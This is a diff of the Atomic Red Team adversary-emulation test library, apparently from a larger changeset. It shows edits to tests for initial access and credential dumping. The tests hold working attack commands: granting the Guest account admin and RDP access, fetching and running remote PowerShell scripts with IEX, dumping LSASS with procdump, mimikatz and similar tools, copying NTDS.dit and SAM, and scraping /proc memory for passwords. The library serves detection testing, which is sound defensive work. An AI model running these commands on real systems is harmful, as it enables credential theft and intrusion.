+        After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group,
+        and desktop will allow multiple RDP connections.
       supported_platforms:
       - windows
       input_arguments:
@@ -66962,6 +67638,10 @@ initial-access:
           description: Specify the guest password
           type: String
           default: Password123!
+        remove_rdp_access_during_cleanup:
+          description: Set to 1 if you want the cleanup to remove RDP access to machine
+          type: Integer
+          default: 0
       executor:
         command: |-
           net user #{guest_user} /active:yes
@@ -66974,8 +67654,9 @@ initial-access:
           net user #{guest_user} /active:no >nul 2>&1
           net localgroup administrators #{guest_user} /delete >nul 2>&1
           net localgroup "Remote Desktop Users" #{guest_user} /delete >nul 2>&1
-          reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1
-          reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1
+          if #{remove_rdp_access_during_cleanup} NEQ 1 (echo Note: set remove_rdp_access_during_cleanup input argument to disable RDP access during cleanup)
+          if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1)
+          if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1)
         name: command_prompt
         elevation_required: true
   T1078.002:
@@ -67642,6 +68323,7 @@ initial-access:
       description: |
         The macro-enabled Excel file contains VBScript which opens your default web browser and opens it to [google.com](http://google.com).
         The below will successfully download the macro-enabled Excel file to the current location.
+        File is downloaded to the %temp% folder.
       supported_platforms:
       - windows
       executor:
@@ -67650,13 +68332,13 @@ initial-access:
             return 'Please install Microsoft Excel before running this test.'
           }
           else{
-            $url = 'https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/bin/PhishingAttachment.xlsm'
+            $url = 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1566.001/bin/PhishingAttachment.xlsm'
             $fileName = 'PhishingAttachment.xlsm'
             New-Item -Type File -Force -Path $fileName | out-null
             $wc = New-Object System.Net.WebClient
             $wc.Encoding = [System.Text.Encoding]::UTF8
             [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-            ($wc.DownloadString("$url")) | Out-File $fileName
+            Invoke-WebRequest -Uri $url -OutFile $fileName
           }
         name: powershell
     - name: Word spawned a command shell and used an IP address in the command line
@@ -67695,7 +68377,8 @@ initial-access:
 '
       executor:
         command: |
-          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
           $macrocode = "   Open `"#{jse_path}`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   Shell`$ `"ping 8.8.8.8`"`n"
           Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
         cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore

atomics/T1003.001/T1003.001.md

@@ -65,10 +65,14 @@ If you see a message saying \"wce.exe is not recognized as an internal or extern
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Path where resulting data should be placed | Path | %temp%\wce-output.txt|
 | wce_zip_hash | File hash of the Windows Credential Editor zip file | String | 8F4EFA0DDE5320694DD1AA15542FE44FDE4899ED7B3A272063902E773B6C4933|
@@ -94,11 +98,12 @@ del "#{output_file}" >nul 2>&1
 ##### Description: Windows Credential Editor must exist on disk at specified location (#{wce_exe})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{wce_exe}) {exit 0} else {exit 1} 
+if (Test-Path #{wce_exe}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
 $parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip"
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing)
 if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){
   Expand-Archive $zippath $parentpath\wce -Force
@@ -124,10 +129,14 @@ If you see a message saying "procdump.exe is not recognized as an internal or ex
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Path where resulting dump should be placed | Path | C:\Windows\Temp\lsass_dump.dmp|
 | procdump_exe | Path of Procdump executable | Path | PathToAtomicsFolder\T1003.001\bin\procdump.exe|
@@ -151,10 +160,11 @@ del "#{output_file}" >nul 2> nul
 ##### Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} 
+if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
 Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
 New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
@@ -175,6 +185,10 @@ Upon successful execution, you should see the following file created $env:TEMP\l
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 2536dee2-12fb-459a-8c37-971844fa73be
+
+
+
 
 
 
@@ -208,10 +222,14 @@ If you see a message saying \"The system cannot find the path specified.\", try
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 7ae7102c-a099-45c8-b985-4c7a2d05790d
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | dumpert_exe | Path of Dumpert executable | Path | PathToAtomicsFolder\T1003.001\bin\Outflank-Dumpert.exe|
 
@@ -234,10 +252,11 @@ del C:\windows\temp\dumpert.dmp >nul 2> nul
 ##### Description: Dumpert executable must exist on disk at specified location (#{dumpert_exe})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1} 
+if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null
 Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile #{dumpert_exe}
 ```
@@ -255,6 +274,10 @@ Manager and administrative permissions.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** dea6c349-f1c6-44f3-87a1-1ed33a59a607
+
+
+
 
 
 #### Run it with these steps! 
@@ -285,10 +308,14 @@ Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and c
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 453acf13-1dbd-47d7-b28a-172ce9228023
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | input_file | Path of the Lsass dump | Path | %tmp%\lsass.DMP|
 | mimikatz_exe | Path of the Mimikatz binary | string | PathToAtomicsFolder\T1003.001\bin\mimikatz.exe|
@@ -308,10 +335,11 @@ Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and c
 ##### Description: Mimikatz must exist on disk at specified location (#{mimikatz_exe})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} 
+if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 $url = 'https://github.com/gentilkiwi/mimikatz/releases/latest'
 $request = [System.Net.WebRequest]::Create($url)
 $response = $request.GetResponse()
@@ -328,7 +356,7 @@ Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force
 ##### Description: Lsass dump must exist at specified location (#{input_file})
 ##### Check Prereq Commands:
 ```powershell
-cmd /c "if not exist #{input_file} (exit /b 1)" 
+cmd /c "if not exist #{input_file} (exit /b 1)"
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -351,6 +379,10 @@ Successful execution of this test will display multiple useranames and passwords
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** c37bc535-5c62-4195-9cc3-0517673171d8
+
+
+
 
 
 
@@ -369,7 +401,7 @@ pypykatz live lsa
 ##### Check Prereq Commands:
 ```cmd
 py -3 --version >nul 2>&1
-exit /b %errorlevel% 
+exit /b %errorlevel%
 ```
 ##### Get Prereq Commands:
 ```cmd
@@ -379,7 +411,7 @@ echo "Python 3 must be installed manually"
 ##### Check Prereq Commands:
 ```cmd
 py -3 -m pip --version >nul 2>&1
-exit /b %errorlevel% 
+exit /b %errorlevel%
 ```
 ##### Get Prereq Commands:
 ```cmd
@@ -389,7 +421,7 @@ echo "PIP must be installed manually"
 ##### Check Prereq Commands:
 ```cmd
 pypykatz -h >nul 2>&1
-exit /b %errorlevel% 
+exit /b %errorlevel%
 ```
 ##### Get Prereq Commands:
 ```cmd
@@ -410,6 +442,10 @@ Upon successful execution, you should see the following file created $env:SYSTEM
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 6502c8f0-b775-4dbd-9193-1298f56b6781
+
+
+
 
 
 
@@ -417,6 +453,7 @@ Upon successful execution, you should see the following file created $env:SYSTEM
 
 
 ```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump
 ```
 
@@ -443,10 +480,14 @@ If you see a message saying "procdump.exe is not recognized as an internal or ex
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 7cede33f-0acd-44ef-9774-15511300b24b
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Path where resulting dump should be placed | Path | C:\Windows\Temp\lsass_dump.dmp|
 | procdump_exe | Path of Procdump executable | Path | PathToAtomicsFolder\T1003.001\bin\procdump.exe|
@@ -470,7 +511,7 @@ del "#{output_file}" >nul 2> nul
 ##### Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} 
+if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -495,10 +536,14 @@ Or, if you try to run the test without the required administrative privleges you
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 66fb0bc1-3c3f-47e9-a298-550ecfefacbc
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | remote_script | URL to a remote Mimikatz script that dumps credentials | Url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1|
 
@@ -525,10 +570,14 @@ This test uses the technique describe in this tweet
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 9d0072c8-7cca-45c4-bd14-f852cfa35cf0
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Path where resulting dump should be placed | Path | C:\Windows\Temp\dotnet-lsass.dmp|
 | createdump_exe | Path of createdump.exe executable | Path | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.*.*\createdump.exe|
@@ -556,7 +605,7 @@ del #{output_file}
 ##### Description: Computer must have createdump.exe from .Net 5
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path '#{createdump_exe}') {exit 0} else {exit 1} 
+if (Test-Path '#{createdump_exe}') {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -579,10 +628,14 @@ Upon successful execution, you should see the following file created $env:TEMP\l
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 86fc3f40-237f-4701-b155-81c01c48d697
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | xordump_exe | Path to xordump | Path | C:\Windows\Temp\xordump.exe|
 | output_file | Path where resulting dump should be placed | Path | C:\Windows\Temp\lsass-xordump.t1003.001.dmp|
@@ -606,10 +659,11 @@ Remove-Item ${output_file} -ErrorAction Ignore
 ##### Description: Computer must have xordump.exe
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1} 
+if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
 ```
 

atomics/T1003.001/T1003.001.yaml

@@ -38,6 +38,7 @@ atomic_tests:
       if (Test-Path #{wce_exe}) {exit 0} else {exit 1}
     get_prereq_command: |
       $parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip"
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
       IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing)
       if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){
         Expand-Archive $zippath $parentpath\wce -Force
@@ -78,6 +79,7 @@ atomic_tests:
     prereq_command: |
       if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
     get_prereq_command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
       Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
       Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
       New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
@@ -129,6 +131,7 @@ atomic_tests:
     prereq_command: |
       if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1}
     get_prereq_command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
       New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null
       Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile #{dumpert_exe}
   executor:
@@ -183,6 +186,7 @@ atomic_tests:
     prereq_command: |
       if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
     get_prereq_command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
       $url = 'https://github.com/gentilkiwi/mimikatz/releases/latest'
       $request = [System.Net.WebRequest]::Create($url)
       $response = $request.GetResponse()
@@ -256,6 +260,7 @@ atomic_tests:
   - windows
   executor:
     command: |
+       [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
        IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump
     cleanup_command: |
       Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
@@ -382,6 +387,7 @@ atomic_tests:
     prereq_command: |
       if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1}
     get_prereq_command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
       Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
   executor:
     command: |

atomics/T1003.002/T1003.002.md

@@ -44,6 +44,10 @@ Upon successful execution of this test, you will find three files named, sam, sy
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 5c2571d0-1572-416d-9676-812e64ca9f44
+
+
+
 
 
 
@@ -76,6 +80,10 @@ Parses registry hives to obtain stored credentials
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** a96872b2-cbf3-46cf-8eb4-27e8c0e85263
+
+
+
 
 
 
@@ -94,7 +102,7 @@ pypykatz live registry
 ##### Check Prereq Commands:
 ```cmd
 py -3 --version >nul 2>&1
-exit /b %errorlevel% 
+exit /b %errorlevel%
 ```
 ##### Get Prereq Commands:
 ```cmd
@@ -104,7 +112,7 @@ echo "Python 3 must be installed manually"
 ##### Check Prereq Commands:
 ```cmd
 py -3 -m pip --version >nul 2>&1
-exit /b %errorlevel% 
+exit /b %errorlevel%
 ```
 ##### Get Prereq Commands:
 ```cmd
@@ -114,7 +122,7 @@ echo "PIP must be installed manually"
 ##### Check Prereq Commands:
 ```cmd
 pypykatz -h >nul 2>&1
-exit /b %errorlevel% 
+exit /b %errorlevel%
 ```
 ##### Get Prereq Commands:
 ```cmd
@@ -134,10 +142,14 @@ This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** a90c2f4d-6726-444e-99d2-a00cd7c20480
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file_path | Path to the file to copy | Path | %SystemRoot%/system32/config/SAM|
 | file_name | Name of the copied file | String | SAM|
@@ -169,6 +181,10 @@ Executes a hashdump by reading the hasshes from the registry.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 804f28fc-68fc-40da-b5a2-e9d0bce5c193
+
+
+
 
 
 

atomics/T1003.003/T1003.003.md

@@ -37,10 +37,14 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | drive_letter | Drive letter to source VSC (including colon) | String | C:|
 
@@ -59,7 +63,7 @@ vssadmin.exe create shadow /for=#{drive_letter}
 ##### Description: Target must be a Domain Controller
 ##### Check Prereq Commands:
 ```cmd
-reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v ProductType | findstr LanmanNT 
+reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v ProductType | findstr LanmanNT
 ```
 ##### Get Prereq Commands:
 ```cmd
@@ -84,10 +88,14 @@ This test must be executed on a Windows Domain Controller.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** c6237146-9ea6-4711-85c9-c56d263a6b03
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | vsc_name | Name of Volume Shadow Copy | String | \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1|
 | extract_path | Path for extracted NTDS.dit | Path | C:\Windows\Temp|
@@ -115,7 +123,7 @@ del "#{extract_path}\SYSTEM_HIVE"     >nul 2> nul
 ##### Description: Target must be a Domain Controller
 ##### Check Prereq Commands:
 ```cmd
-reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v ProductType | findstr LanmanNT 
+reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v ProductType | findstr LanmanNT
 ```
 ##### Get Prereq Commands:
 ```cmd
@@ -124,7 +132,7 @@ echo Sorry, Promoting this machine to a Domain Controller must be done manually
 ##### Description: Volume shadow copy must exist
 ##### Check Prereq Commands:
 ```cmd
-if not exist #{vsc_name} (exit /b 1) 
+if not exist #{vsc_name} (exit /b 1)
 ```
 ##### Get Prereq Commands:
 ```cmd
@@ -133,7 +141,7 @@ echo Run "Invoke-AtomicTest T1003.003 -TestName 'Create Volume Shadow Copy with
 ##### Description: Extract path must exist
 ##### Check Prereq Commands:
 ```cmd
-if not exist #{extract_path} (exit /b 1) 
+if not exist #{extract_path} (exit /b 1)
 ```
 ##### Get Prereq Commands:
 ```cmd
@@ -158,10 +166,14 @@ Upon successful completion, you will find a copy of the ntds.dit file in the C:\
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 2364e33d-ceab-4641-8468-bfb1d7cc2723
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_folder | Path where resulting dump should be placed | Path | C:\Windows\Temp\ntds_T1003|
 
@@ -185,7 +197,7 @@ rmdir /q /s #{output_folder} >nul 2>&1
 ##### Description: Target must be a Domain Controller
 ##### Check Prereq Commands:
 ```cmd
-reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v ProductType | findstr LanmanNT 
+reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v ProductType | findstr LanmanNT
 ```
 ##### Get Prereq Commands:
 ```cmd
@@ -206,10 +218,14 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 224f7de0-8f0a-4a94-b5d8-989b036c86da
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | drive_letter | Drive letter to source VSC (including colon) | String | C:|
 
@@ -228,7 +244,7 @@ wmic shadowcopy call create Volume=#{drive_letter}
 ##### Description: Target must be a Domain Controller
 ##### Check Prereq Commands:
 ```cmd
-reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v ProductType | findstr LanmanNT 
+reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions  /v ProductType | findstr LanmanNT
 ```
 ##### Get Prereq Commands:
 ```cmd
@@ -249,10 +265,14 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 542bb97e-da53-436b-8e43-e0a7d31a6c24
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | drive_letter | Drive letter to source VSC (including colon) | String | C:|
 
@@ -280,10 +300,14 @@ The Active Directory database NTDS.dit may be dumped by creating a symlink to Vo
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 21748c28-2793-4284-9e07-d6d028b66702
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | drive_letter | Drive letter to source VSC (including colon) | String | C:|
 | symlink_path | symlink path | String | C:\Temp\vssstore|

atomics/T1003.004/T1003.004.md

@@ -20,10 +20,14 @@ https://pentestlab.blog/2018/04/04/dumping-clear-text-credentials/#:~:text=LSA%2
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 55295ab0-a703-433b-9ca4-ae13807de12f
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | psexec_exe | Path to PsExec executable | Path | PathToAtomicsFolder\T1003.004\bin\PsExec.exe|
 
@@ -46,7 +50,7 @@ del %temp%\secrets >nul 2> nul
 ##### Description: PsExec from Sysinternals must exist on disk at specified location (#{psexec_exe})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{psexec_exe}) {exit 0} else {exit 1} 
+if (Test-Path #{psexec_exe}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell

atomics/T1003.006/T1003.006.md

@@ -22,10 +22,14 @@ Privileges required: domain admin or domain controller account (by default), or
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 129efd28-8497-4c87-a1b0-73b9a870ca3e
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | domain | Targeted domain | string | example.com|
 | user | Targeted user | string | krbtgt|
@@ -47,7 +51,7 @@ Privileges required: domain admin or domain controller account (by default), or
 ##### Check Prereq Commands:
 ```powershell
 $mimikatz_path = cmd /c echo #{mimikatz_path}
-if (Test-Path $mimikatz_path) {exit 0} else {exit 1} 
+if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell

atomics/T1003.007/T1003.007.md

@@ -0,0 +1,142 @@
+# T1003.007 - Proc Filesystem
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/007)
+<blockquote>Adversaries may gather credentials from information stored in the Proc filesystem or <code>/proc</code>. The Proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively.
+
+This functionality has been implemented in the MimiPenguin(Citation: MimiPenguin GitHub May 2017), an open source tool inspired by Mimikatz. The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Dump individual process memory with sh (Local)](#atomic-test-1---dump-individual-process-memory-with-sh-local)
+
+- [Atomic Test #2 - Dump individual process memory with Python (Local)](#atomic-test-2---dump-individual-process-memory-with-python-local)
+
+
+<br/>
+
+## Atomic Test #1 - Dump individual process memory with sh (Local)
+Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to
+copy process memory to an external file so it can be searched or exfiltrated later.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 7e91138a-8e74-456d-a007-973d67a0bb80
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| output_file | Path where captured results will be placed | Path | /tmp/T1003.007.bin|
+| script_path | Path to script generating the target process | Path | /tmp/T1003.007.sh|
+| pid_term | Unique string to use to identify target process | String | T1003.007|
+
+
+#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
+
+
+```sh
+sh #{script_path}
+PID=$(pgrep -n -f "#{pid_term}")
+HEAP_MEM=$(grep -E "^[0-9a-f-]* r" /proc/"$PID"/maps | grep heap | cut -d' ' -f 1)
+MEM_START=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f1))))
+MEM_STOP=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f2))))
+MEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))
+dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE"
+grep -i "PASS" "#{output_file}"
+```
+
+#### Cleanup Commands:
+```sh
+rm -f "#{output_file}"
+```
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: Script to launch target process must exist
+##### Check Prereq Commands:
+```sh
+test -f #{script_path}
+grep "#{pid_term}" #{script_path}
+```
+##### Get Prereq Commands:
+```sh
+echo '#!/bin/sh' > #{script_path}
+echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #2 - Dump individual process memory with Python (Local)
+Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to
+copy a process's heap memory to an external file so it can be searched or exfiltrated later.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 437b2003-a20d-4ed8-834c-4964f24eec63
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| output_file | Path where captured results will be placed | Path | /tmp/T1003.007.bin|
+| script_path | Path to script generating the target process | Path | /tmp/T1003.007.sh|
+| python_script | Path to script generating the target process | Path | PathToAtomicsFolder/T1003.007/src/dump_heap.py|
+| pid_term | Unique string to use to identify target process | String | T1003.007|
+
+
+#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
+
+
+```sh
+sh #{script_path}
+PID=$(pgrep -n -f "#{pid_term}")
+PYTHON=$(which python || which python3 || which python2)
+$PYTHON #{python_script} $PID #{output_file}
+grep -i "PASS" "#{output_file}"
+```
+
+#### Cleanup Commands:
+```sh
+rm -f "#{output_file}"
+```
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: Script to launch target process must exist
+##### Check Prereq Commands:
+```sh
+test -f #{script_path}
+grep "#{pid_term}" #{script_path}
+```
+##### Get Prereq Commands:
+```sh
+echo '#!/bin/sh' > #{script_path}
